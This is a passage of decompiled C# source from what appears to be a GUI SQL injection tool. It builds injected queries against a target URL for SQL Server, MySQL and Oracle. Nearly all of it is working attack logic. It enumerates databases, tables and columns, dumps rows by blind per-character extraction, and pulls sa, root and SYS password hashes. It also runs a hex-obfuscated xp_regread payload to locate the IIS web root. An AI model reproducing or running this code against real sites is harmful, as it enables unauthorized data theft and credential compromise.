			mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(uRL, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
			mainfrm.CurrentSite.WebRoot = GetItemBySQLServer("select%20top%201%20", "tmp", "from%20" + text, 255, 255, NeedTempTable: false);
			uRL = URL + PreFix + ";drop table " + text + "%3B%2D%2D";
			mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(uRL, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
			if (string.IsNullOrEmpty(mainfrm.CurrentSite.WebRoot))
			{
				TempTbNum++;
				text = "WCRTEMP" + $"{TempTbNum:D5}";
				uRL = URL + PreFix + ";create table " + text + "(tmp varchar(255))%3B%44%45%43%4C%41%52%45%20%40%70%20%76%61%72%63%68%61%72%28%32%35%35%29%3B%65%78%65%63%20%6D%61%73%74%65%72%2E%2E%78%70%5F%72%65%67%72%65%61%64%20%27%48%4B%45%59%5F%4C%4F%43%41%4C%5F%4D%41%43%48%49%4E%45%27%2C%27%53%59%53%54%45%4D%5C%43%6F%6E%74%72%6F%6C%53%65%74%30%30%31%5C%53%65%72%76%69%63%65%73%5C%57%33%53%56%43%5C%50%61%72%61%6D%65%74%65%72%73%5C%56%69%72%74%75%61%6C%20%52%6F%6F%74%73%27%2C%20%27%2F%27%2C%20%40%70%20%6F%75%74%70%75%74%3Binsert into " + text + "(tmp) values(@p);%2D%2D";
				mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(uRL, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
				mainfrm.CurrentSite.WebRoot = GetItemBySQLServer("select%20top%201%20", "tmp", "from%20" + text, 255, 255, NeedTempTable: false);
				uRL = URL + PreFix + ";drop table " + text + "%3B%2D%2D";
				mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(uRL, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
			}
			mainfrm.CurrentSite.WebRoot = mainfrm.CurrentSite.WebRoot.Trim();
			return mainfrm.CurrentSite.WebRoot;
		}

		private void ExecSQLServerCheck(object data)
		{
			try
			{
				for (int i = 0; i < GetListViewCount(listViewEnv); i++)
				{
					if (!IsListViewEnvCheckedAt(i))
					{
						continue;
					}
					string text = ReadListViewInfoItems(i);
					if (mainfrm.CurrentSite.injectMethod == InjectMethod.ToBeDetect)
					{
						GetInjectMethod(URL);
					}
					if (text.Equals("Server"))
					{
						if (string.IsNullOrEmpty(Server))
						{
							Server = GetServer(URL);
						}
						if (string.IsNullOrEmpty(Server))
						{
							Server = "NULL";
						}
						AddSubItem2ListViewInfo(i + "^" + Server);
					}
					else if (text.Equals("Version"))
					{
						string text2 = GetItemBySQLServer("select", "@@version", "", 255, 255, NeedTempTable: false);
						if (string.IsNullOrEmpty(text2))
						{
							text2 = "NULL";
						}
						AddSubItem2ListViewInfo(i + "^" + text2);
					}
					else if (text.Equals("user"))
					{
						string text3 = GetItemBySQLServer("select", "user", "", 255, 128, NeedTempTable: false);
						if (string.IsNullOrEmpty(text3))
						{
							text3 = "NULL";
						}
						AddSubItem2ListViewInfo(i + "^" + text3);
					}
					else if (text.Equals("Database"))
					{
						string text4 = GetItemBySQLServer("select", "db_name()", "", 255, 128, NeedTempTable: false);
						if (string.IsNullOrEmpty(text4))
						{
							text4 = "NULL";
						}
						CurrentDBName = text4;
						AddSubItem2ListViewInfo(i + "^" + text4);
						if (!string.IsNullOrEmpty(text4))
						{
							AddDB2TreeView(text4);
						}
					}
					else if (text.Equals("WWWRoot"))
					{
						string text5 = GetIISWebRoot(URL);
						if (string.IsNullOrEmpty(text5))
						{
							text5 = "NULL";
						}
						else
						{
							mainfrm.CurrentSite.WebRoot = text5;
						}
						AddSubItem2ListViewInfo(i + "^" + text5);
					}
					else if (text.Equals("IsAdmin"))
					{
						string str = GetIntValue("IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)", 1, 0).ToString();
						AddSubItem2ListViewInfo(i + "^" + str);
					}
					else if (text.Equals("Sa_PasswordHash"))
					{
						TempTbNum++;
						string text6 = "WCRTEMP" + $"{TempTbNum:D5}";
						string uRL = URL + PreFix + ";create table " + text6 + "(tmp varchar(255));declare @b varbinary(256),@s varchar(256);select @b=password  from master.dbo.sysxlogins where name=0x73006100;exec master..xp_varbintohexstr @b,@s out;insert into " + text6 + " select @s" + CommentString;
						mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(uRL, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
						string text7 = GetItemBySQLServer("select%20top%201%20", "tmp", "from%20" + text6, 126, 255, NeedTempTable: false);
						uRL = URL + PreFix + ";drop table " + text6 + "%3B" + CommentString;
						mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(uRL, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
						if (string.IsNullOrEmpty(text7))
						{
							text7 = "NULL";
						}
						AddSubItem2ListViewInfo(i + "^" + text7);
					}
				}
			}
			catch
			{
			}
		}

		private string GetItemByMySQL(string SelectExpression, string ItemName, string FromExpression, int MaxChar, int MaxLength)
		{
			string text = "";
			try
			{
				if (WebSite.CurrentStatus == TaskStatus.Stop)
				{
					return "";
				}
				if (mainfrm.CurrentSite.injectMethod == InjectMethod.ToBeDetect)
				{
					GetInjectMethod(URL);
				}
				if (mainfrm.CurrentSite.injectMethod == InjectMethod.UnionBased)
				{
					text = GetItemByFieldEcho(SelectExpression, ItemName, FromExpression, NeedTempTable: false);
					if (!string.IsNullOrEmpty(text))
					{
						return text;
					}
				}
				else if (mainfrm.CurrentSite.injectMethod == InjectMethod.ErrorBased || mainfrm.CurrentSite.injectMethod == InjectMethod.ErrorBasedUserAgent || mainfrm.CurrentSite.injectMethod == InjectMethod.ErrorBasedReferer)
				{
					if (MaxLength > 62)
					{
						int intValue = GetIntValue(SelectExpression + " length(" + ItemName + ") " + FromExpression, MaxLength, 0);
						mainfrm.DisplayLogList("Got Length: " + intValue);
						text = GetItemByMySQLPlainText(SelectExpression + "%20" + ItemName + "%20" + FromExpression, intValue);
					}
					else
					{
						text = GetItemByMySQLPlainText(SelectExpression + "%20" + ItemName + "%20" + FromExpression, MaxLength);
					}
					mainfrm.DisplayLogList("Got : " + text);
					if (!string.IsNullOrEmpty(text))
					{
						return text;
					}
				}
				else if (mainfrm.CurrentSite.injectMethod == InjectMethod.TimeBased)
				{
					int intValue2 = GetIntValue(SelectExpression + " length(" + ItemName + ") " + FromExpression, MaxLength, 0);
					mainfrm.DisplayLogList("Got Length: " + intValue2);
					List<byte> list = new List<byte>();
					for (int i = 0; i < intValue2; i++)
					{
						if (WebSite.CurrentStatus == TaskStatus.Stop)
						{
							return "";
						}
						int intValue3 = GetIntValue(SelectExpression + " ord(substr(" + ItemName + "," + (i + 1) + ",1)) " + FromExpression, MaxChar, 0);
						if (intValue3 >= 0)
						{
							list.Add((byte)intValue3);
						}
						else
						{
							intValue3 = GetIntValue(SelectExpression + " ord(substr(" + ItemName + "," + (i + 1) + ",1)) " + FromExpression, 65535, 0);
							if (intValue3 >= 0)
							{
								byte item = (byte)(intValue3 >> 8);
								byte item2 = (byte)((uint)intValue3 & 0xFFu);
								if (mainfrm.CurrentSite.DBEncoding == Encoding.Unicode)
								{
									list.Add(item2);
									list.Add(item);
								}
								else
								{
									list.Add(item);
									list.Add(item2);
								}
							}
							else
							{
								intValue3 = GetIntValue(SelectExpression + " ord(substr(" + ItemName + "," + (i + 1) + ",1)) " + FromExpression, 15712191, 14712960);
								if (intValue3 > 0)
								{
									list.Add((byte)(intValue3 >> 16));
									list.Add((byte)((uint)(intValue3 >> 8) & 0xFFu));
									list.Add((byte)((uint)intValue3 & 0xFFu));
								}
								else
								{
									list.Add(95);
								}
							}
						}
						byte[] bytes = list.ToArray();
						text = mainfrm.CurrentSite.DBEncoding.GetString(bytes);
						mainfrm.DisplayLogList("Got " + (i + 1) + "/" + intValue2 + " :  " + text);
					}
					return text;
				}
				mainfrm.CurrentSite.CurrentKeyWord = GetKeyWord(URL, skipScanned: true);
				if (string.IsNullOrEmpty(mainfrm.CurrentSite.CurrentKeyWord))
				{
					return "";
				}
				int intValue4 = GetIntValue(SelectExpression + " char_length(" + ItemName + ") " + FromExpression, MaxLength, 0);
				mainfrm.DisplayLogList("Got Length: " + intValue4);
				if (intValue4 < 1)
				{
					return "";
				}
				List<byte> list2 = new List<byte>();
				for (int j = 0; j < intValue4; j++)
				{
					int intValue5 = GetIntValue(SelectExpression + " ord(substr(" + ItemName + "," + (j + 1) + ",1)) " + FromExpression, MaxChar, 0);
					if (intValue5 >= 0)
					{
						list2.Add((byte)intValue5);
					}
					else
					{
						intValue5 = GetIntValue(SelectExpression + " ord(substr(" + ItemName + "," + (j + 1) + ",1)) " + FromExpression, 65535, 0);
						if (intValue5 >= 0)
						{
							byte item3 = (byte)(intValue5 >> 8);
							byte item4 = (byte)((uint)intValue5 & 0xFFu);
							if (mainfrm.CurrentSite.DBEncoding == Encoding.Unicode)
							{
								list2.Add(item4);
								list2.Add(item3);
							}
							else
							{
								list2.Add(item3);
								list2.Add(item4);
							}
						}
						else
						{
							intValue5 = GetIntValue(SelectExpression + " ord(substr(" + ItemName + "," + (j + 1) + ",1)) " + FromExpression, 15712191, 14712960);
							if (intValue5 > 0)
							{
								list2.Add((byte)(intValue5 >> 16));
								list2.Add((byte)((uint)(intValue5 >> 8) & 0xFFu));
								list2.Add((byte)((uint)intValue5 & 0xFFu));
							}
							else
							{
								list2.Add(95);
							}
						}
					}
					byte[] bytes2 = list2.ToArray();
					text = mainfrm.CurrentSite.DBEncoding.GetString(bytes2);
					mainfrm.DisplayLogList("Got " + (j + 1) + "/" + intValue4 + " :  " + text);
				}
				return text;
			}
			catch
			{
				return text;
			}
		}

		private void ExecMySQLGetDB()
		{
			mainfrm.DisplayLogList("Getting DB ...");
			if (cmbChkAllDB.get_SelectedIndex() == 0)
			{
				string itemByMySQL = GetItemByMySQL("select", "database()", "", 255, 128);
				if (!string.IsNullOrEmpty(itemByMySQL))
				{
					AddDB2TreeView(itemByMySQL);
				}
				return;
			}
			int intValue = GetIntValue("select count(SCHEMA_NAME) from information_schema.SCHEMATA", 128, 0);
			mainfrm.DisplayLogList("Got DB Num: " + intValue);
			if (intValue >= 1)
			{
				for (int i = 0; i < intValue; i++)
				{
					ThreadPool.QueueUserWorkItem(new WaitCallback(MySQLGetDBDoWork), i);
				}
			}
		}

		private void MySQLGetDBDoWork(object data)
		{
			try
			{
				int num = (int)data;
				WebSite.DebugLog("Getting DB id: " + num);
				string itemByMySQL = GetItemByMySQL("select", "SCHEMA_NAME", " from information_schema.SCHEMATA limit " + num + ",1", 255, 32);
				AddDB2TreeView(itemByMySQL);
			}
			catch
			{
			}
		}

		private void ExecMySQLGetTable(object data)
		{
			mainfrm.DisplayLogList("Getting Tables ...");
			string text = "";
			int treeViewDBCount = GetTreeViewDBCount("");
			for (int i = 0; i < treeViewDBCount; i++)
			{
				if (TreeViewDBChecked(i.ToString()))
				{
					text = GetTreeViewDBText(i.ToString());
					int num = GetIntValue("select count(TABLE_NAME) from information_schema.tables where TABLE_SCHEMA=" + mainfrm.CurrentSite.EscapeSingleQuotes(text, DBType.MySQL), 256, 0);
					mainfrm.DisplayLogList("Got Table Num: " + num);
					if (num < 0)
					{
						num = 256;
					}
					for (int j = 0; j < num; j++)
					{
						string state = i + "^" + j + "^" + text;
						ThreadPool.QueueUserWorkItem(new WaitCallback(MySQLGetTableDoWork), state);
					}
					break;
				}
			}
		}

		private void MySQLGetTableDoWork(object data)
		{
			try
			{
				string text = (string)data;
				string[] array = text.Split(new char[1]
				{
					'^'
				});
				string text2 = array[1];
				string itemName = array[2];
				string itemByMySQL = GetItemByMySQL("select", "TABLE_NAME", " from information_schema.tables where TABLE_SCHEMA=" + mainfrm.CurrentSite.EscapeSingleQuotes(itemName, DBType.MySQL) + "%20limit " + text2 + ",1", 255, 32);
				AddTable2TreeView(array[0] + "^" + itemByMySQL);
			}
			catch
			{
			}
		}

		private void ExecMySQLGetColumn(object data)
		{
			_ = DateTime.Now;
			string text = "";
			string text2 = "";
			int treeViewDBCount = GetTreeViewDBCount("");
			for (int i = 0; i < treeViewDBCount; i++)
			{
				if (!TreeViewDBChecked(i.ToString()))
				{
					continue;
				}
				text = GetTreeViewDBText(i.ToString());
				int treeViewDBCount2 = GetTreeViewDBCount(i.ToString());
				for (int j = 0; j < treeViewDBCount2; j++)
				{
					if (TreeViewDBChecked(i + "^" + j))
					{
						mainfrm.DisplayLogList("Getting Columns ...");
						string text3 = "";
						text2 = GetTreeViewDBText(i + "^" + j);
						int num = GetIntValue("select count(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA=" + mainfrm.CurrentSite.EscapeSingleQuotes(text, DBType.MySQL) + "%20and TABLE_NAME=" + mainfrm.CurrentSite.EscapeSingleQuotes(text2, DBType.MySQL), 128, 0);
						mainfrm.DisplayLogList("Got Column Num: " + num);
						if (num < 0)
						{
							num = 128;
						}
						for (int k = 0; k < num; k++)
						{
							text3 = i + "^" + j + "^" + k + "^" + text + "^" + text2;
							ThreadPool.QueueUserWorkItem(new WaitCallback(MySQLGetColumnDoWork), text3);
						}
						break;
					}
				}
			}
		}

		private void MySQLGetColumnDoWork(object data)
		{
			try
			{
				string text = (string)data;
				string[] array = text.Split(new char[1]
				{
					'^'
				});
				string text2 = array[0];
				string text3 = array[1];
				string text4 = array[2];
				string itemName = array[3];
				string itemName2 = array[4];
				string itemByMySQL = GetItemByMySQL("select ", "COLUMN_NAME", "from information_schema.COLUMNS where TABLE_SCHEMA=" + mainfrm.CurrentSite.EscapeSingleQuotes(itemName, DBType.MySQL) + "%20and TABLE_NAME=" + mainfrm.CurrentSite.EscapeSingleQuotes(itemName2, DBType.MySQL) + "%20limit " + text4.ToString() + ",1", 255, 32);
				AddColumn2TreeView(text2 + "^" + text3 + "^" + itemByMySQL);
			}
			catch
			{
			}
		}

		private void ExecMySQLGetData(int RowsBegin, int RowsEnd)
		{
			//IL_003a: Unknown result type (might be due to invalid IL or missing references)
			//IL_0040: Expected O, but got Unknown
			//IL_006b: Unknown result type (might be due to invalid IL or missing references)
			//IL_0071: Expected O, but got Unknown
			//IL_00a0: Unknown result type (might be due to invalid IL or missing references)
			//IL_00a7: Expected O, but got Unknown
			//IL_0154: Unknown result type (might be due to invalid IL or missing references)
			//IL_0194: Unknown result type (might be due to invalid IL or missing references)
			mainfrm.DisplayLogList("Getting Data ...");
			string text = "";
			string text2 = "";
			foreach (TreeNode node in treeViewDB.get_Nodes())
			{
				TreeNode val = node;
				if (!val.get_Checked())
				{
					continue;
				}
				text = val.get_Text();
				foreach (TreeNode node2 in val.get_Nodes())
				{
					TreeNode val2 = node2;
					if (!val2.get_Checked())
					{
						continue;
					}
					text2 = val2.get_Text();
					string text3 = "";
					foreach (TreeNode node3 in val2.get_Nodes())
					{
						TreeNode val3 = node3;
						if (val3.get_Checked())
						{
							if (!string.IsNullOrEmpty(text3))
							{
								text3 += ",";
							}
							text3 = text3 + "ifnull(cast(`" + val3.get_Text() + "` as char),char(32))";
						}
					}
					text3 = "concat_ws(char(94)," + text3 + ")";
					int intValue = GetIntValue("select count(1) from " + text + "." + text2, RowsEnd, 0);
					mainfrm.DisplayLogList("Got Rows Num: " + intValue);
					if (intValue == 0)
					{
						MessageBox.Show("No Records Found!");
						break;
					}
					if (intValue > 0 && intValue < RowsEnd)
					{
						RowsEnd = intValue;
						((ToolStripItem)txtRowsEnd).set_Text(intValue.ToString());
					}
					if (RowsBegin > RowsEnd)
					{
						MessageBox.Show("* Exceed Records Range!\r\n* The Rows Num=" + intValue);
						break;
					}
					for (int i = RowsBegin - 1; i < RowsEnd; i++)
					{
						string state = text3 + "^" + text + "^" + text2 + "^" + i;
						ThreadPool.QueueUserWorkItem(new WaitCallback(MySQLGetDataDoWork), state);
					}
					break;
				}
				break;
			}
		}

		private void MySQLGetDataDoWork(object data)
		{
			try
			{
				string[] array = ((string)data).Split(new char[1]
				{
					'^'
				});
				string itemName = array[0];
				string text = array[1];
				string text2 = array[2];
				string text3 = array[3];
				string itemByMySQL = GetItemByMySQL("select", itemName, " from " + text + "." + text2 + " limit " + text3 + ",1", 255, 1024);
				AddItem2ListViewData(itemByMySQL);
			}
			catch
			{
			}
		}

		private void ExecMySQLCheck(object data)
		{
			for (int i = 0; i < listViewEnv.get_Items().get_Count(); i++)
			{
				if (!IsListViewEnvCheckedAt(i))
				{
					continue;
				}
				string text = ReadListViewInfoItems(i);
				if (text.Equals("Version"))
				{
					string itemByMySQL = GetItemByMySQL("select", "@@version", "", 126, 32);
					AddSubItem2ListViewInfo(i + "^" + itemByMySQL);
				}
				else if (text.Equals("Server"))
				{
					if (string.IsNullOrEmpty(Server))
					{
						Server = GetServer(URL);
					}
					if (string.IsNullOrEmpty(Server))
					{
						Server = "NULL";
					}
					AddSubItem2ListViewInfo(i + "^" + Server);
				}
				else if (text.Equals("OS"))
				{
					string itemByMySQL2 = GetItemByMySQL("select", "@@version_compile_os", "", 126, 32);
					AddSubItem2ListViewInfo(i + "^" + itemByMySQL2);
				}
				else if (text.Equals("user"))
				{
					string itemByMySQL3 = GetItemByMySQL("select", "user()", "", 255, 32);
					AddSubItem2ListViewInfo(i + "^" + itemByMySQL3);
				}
				else if (text.Equals("Database"))
				{
					string itemByMySQL4 = GetItemByMySQL("select", "database()", "", 255, 62);
					AddSubItem2ListViewInfo(i + "^" + itemByMySQL4);
					if (!string.IsNullOrEmpty(itemByMySQL4))
					{
						AddDB2TreeView(itemByMySQL4);
					}
				}
				else if (text.Equals("root_PasswordHash"))
				{
					string text2 = GetItemByMySQL("select", "Password", "from mysql.user where User=char(114,111,111,116) limit 1", 126, 64);
					if (string.IsNullOrEmpty(text2))
					{
						text2 = "NULL";
					}
					AddSubItem2ListViewInfo(i + "^" + text2);
				}
			}
		}

		public int UTF8Int2UnicodeInt(int UTF8Int)
		{
			if (UTF8Int < 128)
			{
				return UTF8Int;
			}
			int num = (UTF8Int >> 16) & 0xF;
			int num2 = (UTF8Int >> 8) & 0x3F;
			int num3 = UTF8Int & 0x3F;
			return (num << 12) + (num2 << 6) + num3;
		}

		public int UnicodeInt2UTF8Int(int UnicodeInt)
		{
			if (UnicodeInt < 128)
			{
				return UnicodeInt;
			}
			int num = (UnicodeInt >> 12) & 0xF;
			int num2 = (UnicodeInt >> 6) & 0x3F;
			int num3 = UnicodeInt & 0x3F;
			return (num + 224 << 16) + (num2 + 128 << 8) + (num3 + 128);
		}

		private string GetItemByOracle(string SelectExpression, string ItemName, string FromExpression, int MaxChar, int MaxLength)
		{
			string text = "";
			try
			{
				if (WebSite.CurrentStatus == TaskStatus.Stop)
				{
					return "";
				}
				if (mainfrm.CurrentSite.injectMethod == InjectMethod.ToBeDetect)
				{
					GetInjectMethod(URL);
				}
				if (mainfrm.CurrentSite.injectMethod == InjectMethod.ErrorBased)
				{
					text = GetItemByOraclePlainText(SelectExpression + "%20" + ItemName + "%20" + FromExpression);
					mainfrm.DisplayLogList("Got : " + text);
					if (!string.IsNullOrEmpty(text))
					{
						return text;
					}
				}
				else if (mainfrm.CurrentSite.injectMethod == InjectMethod.UnionBased)
				{
					text = GetItemByFieldEcho(SelectExpression, ItemName, FromExpression, NeedTempTable: false);
					mainfrm.DisplayLogList("Got : " + text);
					if (!string.IsNullOrEmpty(text))
					{
						return text;
					}
				}
				else if (mainfrm.CurrentSite.injectMethod == InjectMethod.CrossSiteBased)
				{
					text = GetItemByCrossSite(SelectExpression, ItemName, FromExpression);
					mainfrm.DisplayLogList("Got : " + text);
					if (!string.IsNullOrEmpty(text))
					{
						return text;
					}
				}
				mainfrm.CurrentSite.CurrentKeyWord = GetKeyWord(URL, skipScanned: true);
				if (string.IsNullOrEmpty(mainfrm.CurrentSite.CurrentKeyWord))
				{
					return "";
				}
				int intValue = GetIntValue(SelectExpression + " length(" + ItemName + ") " + FromExpression, MaxLength, 0);
				mainfrm.DisplayLogList("Got Length: " + intValue);
				List<byte> list = new List<byte>();
				for (int i = 0; i < intValue; i++)
				{
					int intValue2 = GetIntValue(SelectExpression + " ASCII(substr(" + ItemName + "," + (i + 1) + ",1)) " + FromExpression, MaxChar, 0);
					if (intValue2 >= 0)
					{
						list.Add((byte)intValue2);
					}
					else
					{
						intValue2 = GetIntValue(SelectExpression + " ASCII(substr(" + ItemName + "," + (i + 1) + ",1)) " + FromExpression, 65535, 0);
						if (intValue2 >= 0)
						{
							byte item = (byte)(intValue2 >> 8);
							byte item2 = (byte)((uint)intValue2 & 0xFFu);
							if (mainfrm.CurrentSite.DBEncoding == Encoding.Unicode)
							{
								list.Add(item2);
								list.Add(item);
							}
							else
							{
								list.Add(item);
								list.Add(item2);
							}
						}
						else
						{
							intValue2 = GetIntValue(SelectExpression + " ASCII(substr(" + ItemName + "," + (i + 1) + ",1)) " + FromExpression, 15712191, 14712960);
							if (intValue2 > 0)
							{
								list.Add((byte)(intValue2 >> 16));
								list.Add((byte)((uint)(intValue2 >> 8) & 0xFFu));
								list.Add((byte)((uint)intValue2 & 0xFFu));
							}
							else
							{
								list.Add(95);
							}
						}
					}
					byte[] bytes = list.ToArray();
					text = mainfrm.CurrentSite.DBEncoding.GetString(bytes);
					mainfrm.DisplayLogList("Got " + (i + 1) + "/" + intValue + " :  " + text);
				}
				if (!string.IsNullOrEmpty(text))
				{
					return text;
				}
				return text;
			}
			catch
			{
				return text;
			}
		}

		private void ExecOracleCheck(object data)
		{
			for (int i = 0; i < listViewEnv.get_Items().get_Count(); i++)
			{
				if (!IsListViewEnvCheckedAt(i))
				{
					continue;
				}
				string text = ReadListViewInfoItems(i);
				if (text.Equals("Version"))
				{
					string itemByOracle = GetItemByOracle("select", "version", "from v$instance", 126, 64);
					if (string.IsNullOrEmpty(itemByOracle))
					{
						itemByOracle = GetItemByOracle("select", "banner", "from v$version where banner like %27TNS%25%27", 126, 64);
					}
					AddSubItem2ListViewInfo(i + "^" + itemByOracle);
				}
				else if (text.Equals("Server"))
				{
					if (string.IsNullOrEmpty(Server))
					{
						Server = GetServer(URL);
					}
					if (string.IsNullOrEmpty(Server))
					{
						Server = "NULL";
					}
					AddSubItem2ListViewInfo(i + "^" + Server);
				}
				else if (text.Equals("user"))
				{
					string itemByOracle2 = GetItemByOracle("select", "user", "from dual", 255, 128);
					AddSubItem2ListViewInfo(i + "^" + itemByOracle2);
				}
				else if (text.Equals("instance_name"))
				{
					string text2 = GetItemByOracle("select", "instance_name", "from v$instance", 255, 128);
					if (string.IsNullOrEmpty(text2))
					{
						text2 = GetItemByOracle("select", "name", "from v$database", 255, 128);
					}
					if (string.IsNullOrEmpty(text2))
					{
						text2 = GetItemByOracle("select", "SYS.DATABASE_NAME", "FROM DUAL", 255, 128);
					}
					if (string.IsNullOrEmpty(text2))
					{
						text2 = "NULL";
					}
					AddSubItem2ListViewInfo(i + "^" + text2);
					if (!string.IsNullOrEmpty(text2))
					{
						AddDB2TreeView(text2);
					}
				}
				else if (text.Equals("SYS_PasswordHash"))
				{
					string text3 = GetItemByOracle("select", "PASSWORD", "from dba_users where username=chr(83)||chr(89)||chr(83)", 126, 64);
					if (string.IsNullOrEmpty(text3))
					{
						text3 = "NULL";
					}
					AddSubItem2ListViewInfo(i + "^" + text3);
				}
				else if (text.Equals("user_PasswordHash"))
				{
					string text4 = GetItemByOracle("select", "PASSWORD", "from dba_users where username=user", 126, 64);
					if (string.IsNullOrEmpty(text4))
					{
						text4 = "NULL";
					}
					AddSubItem2ListViewInfo(i + "^" + text4);
				}
			}
		}

		private void ExecOracleGetDB()
		{
			mainfrm.DisplayLogList("Getting DB ...");
			string itemByOracle = GetItemByOracle("select", "instance_name", "from v$instance", 255, 128);
			if (!string.IsNullOrEmpty(itemByOracle))
			{
				AddDB2TreeView(itemByOracle);
			}
		}

		private void ExecOracleGetTable(object data)
		{
			mainfrm.DisplayLogList("Getting Tables ...");
			int treeViewDBCount = GetTreeViewDBCount("");
			for (int i = 0; i < treeViewDBCount; i++)
			{
				if (!TreeViewDBChecked(i.ToString()))
				{
					continue;
				}
				GetTreeViewDBText(i.ToString());
				int num = GetIntValue("select count(TABLE_NAME) from user_tables", 256, 0);
				mainfrm.DisplayLogList("Got Table Num: " + num);
				if (num < 0)
				{
					num = 256;
				}
				for (int j = 0; j < num; j++)
				{
					string text = i + "^" + (j + 1);
					if (mainfrm.CurrentSite.injectMethod == InjectMethod.CrossSiteBased)
					{
						OracleGetTableDoWork(text);
					}
					else
					{
						ThreadPool.QueueUserWorkItem(new WaitCallback(OracleGetTableDoWork), text);
					}
				}
				break;
			}
		}

		private void OracleGetTableDoWork(object data)
		{
			try
			{
				string text = (string)data;
				string[] array = text.Split(new char[1]
				{
					'^'
				});
				string str = array[1];
				string itemByOracle = GetItemByOracle("select", "TABLE_NAME", " from (select ROWNUM,table_name from user_tables where rownum<=" + str + " order by ROWNUM desc) where rownum<=1", 255, 128);
				AddTable2TreeView(array[0] + "^" + itemByOracle);
			}
			catch
			{
			}
		}

		private void ExecOracleGetColumn(object data)
		{
			_ = DateTime.Now;
			string text = "";
			int treeViewDBCount = GetTreeViewDBCount("");
			for (int i = 0; i < treeViewDBCount; i++)
			{
				if (!TreeViewDBChecked(i.ToString()))
				{
					continue;
				}
				GetTreeViewDBText(i.ToString());
				int treeViewDBCount2 = GetTreeViewDBCount(i.ToString());
				for (int j = 0; j < treeViewDBCount2; j++)
				{
					if (TreeViewDBChecked(i + "^" + j))
					{
						mainfrm.DisplayLogList("Getting Columns ...");
						string text2 = "";
						text = GetTreeViewDBText(i + "^" + j);
						int num = GetIntValue("select count(COLUMN_NAME) FROM user_tab_columns WHERE table_name=" + mainfrm.CurrentSite.EscapeSingleQuotes(text, DBType.Oracle), 128, 0);
						mainfrm.DisplayLogList("Got Column Num: " + num);
						if (num < 0)
						{
							num = 128;
						}
						for (int k = 0; k < num; k++)
						{
							text2 = i + "^" + j + "^" + (k + 1) + "^" + text;
							ThreadPool.QueueUserWorkItem(new WaitCallback(OracleGetColumnDoWork), text2);
						}
						break;
					}
				}
			}
		}

		private void OracleGetColumnDoWork(object data)
		{
			try
			{
				string text = (string)data;
				string[] array = text.Split(new char[1]
				{
					'^'
				});
				string text2 = array[0];
				string text3 = array[1];
				string text4 = array[2];
				string itemName = array[3];
				string itemByOracle = GetItemByOracle("select ", "COLUMN_NAME", "from (select ROWNUM,COLUMN_NAME FROM user_tab_columns WHERE table_name=" + mainfrm.CurrentSite.EscapeSingleQuotes(itemName, DBType.Oracle) + " and rownum<=" + text4 + " order by ROWNUM desc) where rownum<=1", 255, 128);
				AddColumn2TreeView(text2 + "^" + text3 + "^" + itemByOracle);
			}
			catch
			{
			}
		}

		private void ExecOracleGetData(int RowsBegin, int RowsEnd)
		{
			//IL_0034: Unknown result type (might be due to invalid IL or missing references)
			//IL_003a: Expected O, but got Unknown
			//IL_0065: Unknown result type (might be due to invalid IL or missing references)
			//IL_006b: Expected O, but got Unknown
			//IL_00a0: Unknown result type (might be due to invalid IL or missing references)
			//IL_00a7: Expected O, but got Unknown
			//IL_015d: Unknown result type (might be due to invalid IL or missing references)
			//IL_019d: Unknown result type (might be due to invalid IL or missing references)
			mainfrm.DisplayLogList("Getting Data ...");
			string text = "";
			foreach (TreeNode node in treeViewDB.get_Nodes())
			{
				TreeNode val = node;
				if (!val.get_Checked())
				{
					continue;
				}
				val.get_Text();
				foreach (TreeNode node2 in val.get_Nodes())
				{
					TreeNode val2 = node2;
					if (!val2.get_Checked())
					{
						continue;
					}
					text = val2.get_Text();
					string text2 = "";
					string text3 = "";
					foreach (TreeNode node3 in val2.get_Nodes())
					{
						TreeNode val3 = node3;
						if (val3.get_Checked())
						{
							if (!string.IsNullOrEmpty(text2))
							{
								text2 += "||chr(94)||";
							}
							text2 = text2 + "NVL(cast(" + val3.get_Text() + " as varchar(64)),chr(32))";
							if (!string.IsNullOrEmpty(text3))
							{
								text3 += ",";
							}
							text3 += val3.get_Text();
						}
					}
					int intValue = GetIntValue("select count(1) from " + text, RowsEnd, 0);
					mainfrm.DisplayLogList("Got Rows Num: " + intValue);
					if (intValue == 0)
					{
						MessageBox.Show("No Records Found!");
						break;
					}
					if (intValue > 0 && intValue < RowsEnd)
					{
						RowsEnd = intValue;
						((ToolStripItem)txtRowsEnd).set_Text(intValue.ToString());
					}
					if (RowsBegin > RowsEnd)
					{
						MessageBox.Show("* Exceed Records Range!\r\n* The Rows Num=" + intValue);
						break;
					}
					for (int i = RowsBegin - 1; i < RowsEnd; i++)
					{
						string state = text2 + ":" + text3 + ":" + text + ":" + i;
						ThreadPool.QueueUserWorkItem(new WaitCallback(OracleGetDataDoWork), state);
					}
					break;
				}
				break;
			}
		}

		private void OracleGetDataDoWork(object data)
		{
			try
			{
				string[] array = ((string)data).Split(new char[1]
				{
					':'
				});
				string itemName = array[0];
				string text = array[1];
				string text2 = array[2];
				int num = int.Parse(array[3]);
				string itemByOracle = GetItemByOracle("select", itemName, "from (select  " + text + " from " + text2 + " where rownum<=" + (num + 1) + " order by rownum desc) where rownum<=1", 255, 1024);
				AddItem2ListViewData(itemByOracle);
			}
			catch
			{
			}
		}

		private void ExecDB2Check(object data)
		{
			mainfrm.CurrentSite.CurrentKeyWord = GetKeyWord(URL, skipScanned: true);
			if (string.IsNullOrEmpty(mainfrm.CurrentSite.CurrentKeyWord))
			{
				return;
			}
			for (int i = 0; i < listViewEnv.get_Items().get_Count(); i++)
			{
				if (!IsListViewEnvCheckedAt(i))
				{
					continue;
				}
